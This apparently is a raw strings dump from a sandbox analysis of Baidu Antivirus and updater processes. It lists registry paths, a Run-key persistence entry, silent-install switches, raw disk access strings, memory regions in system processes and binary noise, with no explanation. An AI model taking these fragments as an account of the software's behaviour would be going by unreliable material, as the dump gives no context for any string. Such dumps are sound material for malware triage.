UDP-PL_SRV_REGREPIR_FID

UDP-PL_SRV_PL_FID

UDP-PL_SRV_REPT02_FID

UDP-PL_SRV_FSD

UDP-PL_TRY_ID:%d

UDP-PL_TRY_RUN

UDP-PL_TRY_INSTPH_FID

UDP-PL_TRY_UN_ATRUN

UDP-PL_TRY_REPT01_FID

UDP-PL_TRY_PL_FID

UDP-PL_TRY_REPT02_FID

UDP-PL_TRY_FSD

UDP-PL_RPT_INIT_FID

UDP-ADM_SET_KITU

UDP-ADM_SET_MWR_PATH

UDP-ADM_OS_ERR

UDP-ADM_PROC_DIR_UN_EXIST

UDP-ADM_PROC_GT_VER_FID

UDP-ADM_PROC_MATCH_FID

BaiduAnSvc.exe" -r

BDMDownload.dll

BDMUpdate.dll

uninst.exe

%s%d\%lld\

Download.data

download.db

publish.db

profile.db

%d_id

%d_version

%d_customer

%s%d\

metadata.db

NewTab_ErrorURL

\updateTips.dat

%s\FTSWManager\%s

sw_property.dat

sw_class_filter.db

{AF849809-EC94-47CB-80E9-1452BEC92ADA}

Baiduan.exe -stmd=2 -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}

Onekey

Baiduan.exe -selplugin={D886CCB7-9946-4246-9502-D25F2F948431}\{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}\{D8CD8DC5-D053-402a-99D9-47554C744B0C}

IconMsgWndClass

{1CB69707-E42B-4128-8A00-7336B93DC262}

baiduan.exe -stmd=6

{E9C9ED70-127F-4BE4-9821-74160A768A90}

{7576896A-4E2F-4665-AB7D-95938D2632F1}

{F5E93978-539C-476B-9A7B-B6C32025A557}

{BFB3F7A3-4FA1-466f-AB97-A96EFA9EFA6E}

{D8CD8DC5-D053-402a-99D9-47554C744B0C}

{5DF529E5-045B-4f5d-9F08-9F5328008DF7}

BDASoftmgr.exe -sm -openby=bdmtray

BDMgr.exe -stmd=7

BDMgr.exe -stmd=6

hXXp://weishi.baidu.com/feedback/

TrayPluginContainerConfig.xml

{E059A29F-D2ED-4f28-849A-851AA9D5A05C}

ic_info_64.png

ic_warning_48.png

ic_question_48.png

ic_done_48.png

QQ.exe

screen_snapshot.exe

SnippingTool.exe

CommonRes.rdb

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn

BDASoftmgr.exe

BDASWDeskGuide.exe

BaiduAnBugRpt.exe

BaiduAn.exe

BaiduAnUpdate.exe

CommonMsgBox

Client.exe

\GameNoDisturb.ini

Shell32.dll

FreeDistractionTips.xml

BaiduAn{D8A4131D-3A7A-48a1-B080-28E1DC04F7C2}

TrayMenu.xml

Config\config.ini

%d-%d-%d

btn_switch_on_normal.png

ActivateTrayApp_{E6F42A49-F45B-4FDF-ADD8-DFAE10011BD1}

{94F31545-51B0-433d-B3E2-7D3A0C6482F2}

ActivateMainApp_{6AD16C03-B3BA-4b15-B502-A0A603DC8092}\{5DF529E5-045B-4f5d-9F08-9F5328008DF7}

btn_switch_on_hover.png

btn_switch_on_pressed.png

btn_switch_off_normal.png

btn_switch_off_hover.png

btn_switch_off_pressed.png

3.0.0.185

hXXp://weishi.baidu.com

hXXp://weishi.baidu.com/privacy.html

about.xml

kBDMNet.dll

c:\bd_swtray_log.txt

%s:%d

D:\BDdownloads

QueryIpcAddressHelper

testtips.xml

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

Mfile='skin_image16.png' xtiled='true' ytiled='true'

skin_image16.png

file='%s' xtiled='true' ytiled='true'

B\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

CommonMsgBox.xml

\kernel32.dll

Windows 8.1

Windows 8.0

Windows 7

Windows Vista

Windows 7

Windows Vista

Windows Server 2003,

Windows XP

Windows 2000

Windows NT

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009

Windows 95

Windows 98

Windows ME

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

okernel32.dll

HKEY_USERS

LKernel32.dll

xxxxxxxxxxxxxxxx

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

\Global.db

BWintrust.dll

Crypt32.dll

iphlpapi.dll

B\\.\PhysicalDrive%d

\\.\Scsi%d:

B6BE417DD-264A-4678-A036-74D2173ECCEB

d-d-d

L{X-X-X-XX-XXXXXX}

D823ABCA-A92F-429d-9E11-3779B5F682AA

\NotInstalledPlugin.xml

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

\PluginSetup.xml

\HotPlugins.xml

\HotPlugin.bnr

PluginSetup.xml

{E5B65788-3C2C-4F59-92E7-58C9205BC66E}

C##cmd:

DUninstalledPlugins.xml

/handle=%d /supplyid=%d /installmode=2 /S /D=%s

PackCache.xml

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

0123456789

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

BaiduanTray.exe

BDALeakfixer.exe_3188:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

asio.misc

asio.misc error

c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

inflate 1.2.5 Copyright 1995-2010 Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

X;

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BDALeakfixer.pdb

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

BDMFrameWork.dll

SHLWAPI.dll

BDMSkin.dll

GetWindowsDirectoryW

GetProcessHeap

KERNEL32.dll

USER32.dll

RegOpenKeyExW

RegCloseKey

ADVAPI32.dll

ShellExecuteW

ShellExecuteExW

SHFileOperationW

SHELL32.dll

ole32.dll

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

MSVCP80.dll

WS2_32.dll

imagehlp.dll

GetSystemWindowsDirectoryW

RegDeleteKeyW

RegCreateKeyExW

.?AVCBDCmdParser@BDMLogicMisc@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AUPluginInfoPassiveSaver@@

.?AVCCmdPluginLauncher@@

.?AVCExePluginLauncher@@

.?AVIPluginCmdExecutor@@

Ã¿F=

77X7

0#0*070_0

=#=5=:=^=

00S0Z0f0w0

>%>,>3>:>

6 6$6(6,60646

download.db

publish.db

profile.db

BDALeakfixer.exe

BaiduAn{BCAE54CF-7A1E-4842-908B-3D0AEF98409B}

PatcherContainer.xml

D{0C8BFEC2-961C-4777-ADBE-522A06690AD9}

BaiduAn.exe

BaiduAnTray.exe

\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

Kernel32.dll

Dxxxxxxxxxxxxxxxx

Wintrust.dll

Crypt32.dll

6BE417DD-264A-4678-A036-74D2173ECCEB

D823ABCA-A92F-429d-9E11-3779B5F682AA

\NotInstalledPlugin.xml

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

\PluginSetup.xml

\HotPlugins.xml

\HotPlugin.bnr

PluginSetup.xml

{E5B65788-3C2C-4F59-92E7-58C9205BC66E}

BPackCache.xml

BDMDownload.dll

B/handle=%d /supplyid=%d /installmode=2 /S /D=%s

%d.%d

##cmd:

UninstalledPlugins.xml

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

{X-X-X-XX-XXXXXX}

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

3.0.0.3971

BDLeakfixer.exe

BaiduAnUpdate.exe_3124:

.text

`.rdata

@.data

.rsrc

@.reloc

PSSSSSSh

SShwB

%D|PFB|

..\src\google\protobuf\message_lite.cc

CHECK failed: !coded_out.HadError():

%d.%d.%d

libprotobuf %s %s:%d] %s

..\src\google\protobuf\stubs\common.cc

..\src\google\protobuf\io\coded_stream.cc

..\src\google\protobuf\io\zero_copy_stream_impl_lite.cc

inflate 1.2.5 Copyright 1995-2010 Mark Adler

deflate 1.2.5 Copyright 1995-2010 Jean-loup Gailly and Mark Adler

1.2.5

{0F7048BB-E983-47bb-825E-0C2BF9F95719}

{8CEFC9E6-A2B4-4c2a-823C-6903A31139FA}

X;

%s>

%s="%s"

%s='%s'

version="%s"

encoding="%s"

standalone="%s"

1.0.1.1

%d.%d

d-d-d d:d:d

RegKey

RootKey

SubKey

IsNative64Key

CryptMsgGetParam

CryptMsgClose

CertFindCertificateInStore

CertFreeCertificateContext

CertCloseStore

CertGetNameStringW

CryptCATCatalogInfoFromContext

Content-Length:%d

s.x.baidu.com

c:\clientci\workspace\bdm_v3.0_fix_compile\stable_proj\include\thirdInclude\boost/exception/detail/exception_ptr.hpp

.\update.pb.cc

%s:%u

%u.%u.%u.%u

addr %s not good...

Unsupported Media Type

HTTP Version not supported

HTTP/1.0

HTTP/1.1

1.0.0.1

.\header.pb.cc

https

ftpes

ftps

tftp

% ;?:@=&,$/-_!.~*()

System\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}

%s\Connection

c:\clientci\workspace\bdm_v3.0_fix_compile\basic\Output\BinRelease\BaiduAnUpdate.pdb

?StartFadeInFadeOut@CBDMControlUI@BDMSkin@@UAEXEEKK_N0@Z

?SetAlpha@CBDMLabelUI@BDMSkin@@UAEXE@Z

BDMSkin.dll

BDMFrameWork.dll

?GetBDMReportMgr@BDLogicUtils@@YAPAVIBDMReportMgr@1@XZ

BDLogicUtils.dll

IMM32.dll

SHDeleteKeyW

SHLWAPI.dll

GetProcessHeap

GetWindowsDirectoryW

GetSystemWindowsDirectoryW

KERNEL32.dll

USER32.dll

GDI32.dll

RegCloseKey

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

RegCreateKeyExW

RegSetKeySecurity

RegFlushKey

RegNotifyChangeKeyValue

RegGetKeySecurity

RegDeleteKeyW

ADVAPI32.dll

ShellExecuteW

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

MSVCP80.dll

PSAPI.DLL

MSVCR80.dll

_amsg_exit

_wcmdln

_crt_debugger_hook

WTSAPI32.dll

USERENV.dll

imagehlp.dll

InternetCrackUrlW

HttpOpenRequestW

HttpQueryInfoW

HttpSendRequestW

WININET.dll

NETAPI32.dll

?GetWindowsDirectoryW@utils@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ

WS2_32.dll

RegOpenKeyExA

BaiduAnUpdate.exe

.?AVCCmdLine@@

.?AVCBDCmdParser@BDMLogicMisc@@

.?AVCBDMCommonMsgBox@@

.?AV?$BDMNotifyDelegate@VCBDMCommonMsgBox@@V1@@ExpandInterface@BDMSkin@@

.?AVTSMsg@@

.?AVIBDMMsg@@

.?AVTSMsgDispatcher@@

.?AVITSMsgDispatcher@@

.?AVTSMsgStub@@

.?AVITSMsgStub@@

.?AVTSMsgMap@@

.?AVITSMsgMap@@

.?AUPluginInfoPassiveSaver@@

.?AVheader@http@bena@@

.?AVresponse@http@bena@@

.?AVrequest@http@bena@@

Ã¿F=

5%5S5g5y5

1,2

5%5s5x5

i0-2}2$3F3

='=6=`>|>

0%0*070{0

4L4U4s4y4
3> >$>(>,>0>4>8>
? ?$?(?,?0?4?8?
HKEY_LOCAL_MACHINE\Software
HKEY_CURRENT_USER\Software\Classes\CLSID
HKEY_CURRENT_USER\Software\Classes\DirectShow
HKEY_CURRENT_USER\Software\Classes\Interface
HKEY_CURRENT_USER\Software\Classes\Media Type
HKEY_CURRENT_USER\Software\Classes\MediaFoundation
HKEY_CLASSES_ROOT\CLSID
HKEY_CLASSES_ROOT\DirectShow
HKEY_CLASSES_ROOT\Interface
HKEY_CLASSES_ROOT\Media Type
HKEY_CLASSES_ROOT\MediaFoundation
HKEY_LOCAL_MACHINE\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\CLSID
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\DirectShow
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Interface
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\Media Type
HKEY_CURRENT_USER\Software\Wow6432Node\Classes\MediaFoundation
HKEY_CLASSES_ROOT\Wow6432Node\CLSID
HKEY_CLASSES_ROOT\Wow6432Node\DirectShow
HKEY_CLASSES_ROOT\Wow6432Node\Interface
HKEY_CLASSES_ROOT\Wow6432Node\Media Type
HKEY_CLASSES_ROOT\Wow6432Node\MediaFoundation
\GameNoDisturb.ini

d.d.d d:d

\GlobalPluginInfo.xml

\LocalPluginInfo.xml

PluginSetup.xml

BaiduAnLOCAL_PLUGIN_MOD_MUTEX_{118A205F-4B51-4944-8384-93CC04727168}

/handle=%d /supplyid=%d /installmode=2 /S /D=%s

{E2206DEE-0CAF-4337-8DA8-1EF057A426B8}

\PluginSetup.xml

PackCache_overall_plugin_update.xml

\\.\pipe\{B99F6A00-E6C9-4253-9708-C6EFB939FD53}

IBDMUPDATE_{A2EBD9CD-6348-4980-B95F-202BE39A46F3}

{DCD4260B-CEED-4514-895D-CA0AF61DEA5E}

UninstalledPlugins.xml

\bdmantivirus\kavupdate.dll

BDMUpdate.dll

BDMNet.dll

eBaiduAnUpdate.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Baidu\BaiduAn

/S /handle=%d /installmode=1

/S /handle=%d /installmode=1 /startmain=0

"{0}" {1}

SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

ic_info_64.png

ic_warning_48.png

ic_question_48.png

ic_done_48.png

BDMUpdateWnd.xml

BaiduAn.exe

BaiduAnTray.exe

btn_close_hover.png

btn_close_pressed.png

btn_ok_hover.png

btn_ok_pressed.png

ic_done_48_48.png

ic_info_48_48.png

important_tip

CommonRes.rdb

CommonMsgBox

CommonMsgBox.xml

Global\{74B41C93-AC9A-4a9e-85E0-27A02EA509FA}

ntdll.dll

EXPLORER.EXE

explorer.exe

file='skin_image16.png' xtiled='true' ytiled='true'

skin_image16.png

file='%s' xtiled='true' ytiled='true'

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

okernel32.dll

HKEY_USERS

xxxxxxxxxxxxxxxx

EKernel32.dll

Software\Microsoft\Windows NT\CurrentVersion\Time Zones\

Software\Microsoft\Windows NT\CurrentVersion\ProfileList\

Software\Microsoft\Windows NT\CurrentVersion\Print\

Software\Microsoft\Windows NT\CurrentVersion\Ports\

Software\Microsoft\Windows NT\CurrentVersion\Perflib\

Software\Microsoft\Windows NT\CurrentVersion\NetworkCards\

Software\Microsoft\Windows NT\CurrentVersion\Language Pack\

Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\

Software\Microsoft\Windows NT\CurrentVersion\Gre_Initialize\

Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\

Software\Microsoft\Windows NT\CurrentVersion\Fonts\

Software\Microsoft\Windows NT\CurrentVersion\FontMapper\

Software\Microsoft\Windows NT\CurrentVersion\FontLink\

Software\Microsoft\Windows NT\CurrentVersion\FontDpi\

Software\Microsoft\Windows NT\CurrentVersion\Console\

Software\Microsoft\Windows\CurrentVersion\Telephony\Locations\

Software\Microsoft\Windows\CurrentVersion\Setup\

Software\Microsoft\Windows\CurrentVersion\PreviewHandlers\

Software\Microsoft\Windows\CurrentVersion\Policies\

Software\Microsoft\Windows\CurrentVersion\Group Policy\

Software\Microsoft\Windows\CurrentVersion\Explorer\KindMap\

Software\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons\

Software\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers\

Software\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes\

Software\Microsoft\Windows\CurrentVersion\App Paths\

Software\Microsoft\SystemCertificates\

Software\Microsoft\EnterpriseCertificates\

system32\winlogon.exe

GWintrust.dll

Crypt32.dll

6BE417DD-264A-4678-A036-74D2173ECCEB

E{X-X-X-XX-XXXXXX}

D823ABCA-A92F-429d-9E11-3779B5F682AA

E##cmd:

\NotInstalledPlugin.xml

\HotPlugins.xml

\HotPlugin.bnr

{E5B65788-3C2C-4F59-92E7-58C9205BC66E}

BDMDownload.dll

BPackCache.xml

CUninstalledPlugins.xml

BDMUPDATE_{626ADED9-5989-4e97-A482-09AC95C17D47}

C.bdtmp

.old_

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0

\Global.db

Diphlpapi.dll

D\\.\PhysicalDrive%d

\\.\Scsi%d:

%Documents and Settings%\All Users\Application Data\Baidu\BaiduAn\Config\

3.0.0.3971

BaiduanUpdate.exe

services.exe_724_rwx_00040000_00001000:

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll

svchost.exe_1084_rwx_018A0000_00001000:

%Program Files%\Common Files\Baidu\BaiduHips\1.0.0.667\bd0001.dll

3j3>3r3>